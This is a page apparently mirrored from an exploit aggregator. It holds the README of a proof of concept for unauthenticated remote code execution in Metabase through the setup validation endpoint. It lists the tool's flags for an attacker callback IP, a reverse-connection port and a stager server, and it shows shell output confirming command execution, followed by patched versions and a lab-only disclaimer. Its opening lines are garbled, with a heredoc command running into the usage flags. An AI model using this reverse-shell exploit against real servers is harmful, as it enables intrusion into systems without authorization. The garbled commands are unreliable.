Share
## https://sploitus.com/exploit?id=580287DA-3A52-5460-990D-C6364A070306
cd ~/metabase-poc
cat > README.md  -p 4444 -P 8000 -u http://localhost:3000
```

- `-l` โ€” attacker callback IP (Docker bridge gateway when target is a
  local container, e.g. `172.17.0.1`)
- `-p` โ€” port the reverse data channel connects back on
- `-P` โ€” local HTTP server port serving the stager script
- `-u` โ€” target Metabase base URL

Drops into an interactive `metabase_shell >` prompt once the pre-auth
callback confirms exploitability.

## Result
metabase_shell > whoami
metabase
metabase_shell > id
uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)

Command execution confirmed as the `metabase` service account โ€” pre-auth,
no credentials required. Severity stems from network-reachable RCE with
zero authentication, not from the privilege level of the resulting shell.

## Fix
Patched in Metabase 0.46.6.1 / 1.46.6.1 and later โ€” the `/api/setup/validate`
endpoint now requires setup to be genuinely incomplete, and setup tokens
are invalidated once initial setup finishes.

## Disclaimer
For isolated lab use only. Do not run against Metabase instances you do
not own or have explicit authorization to test.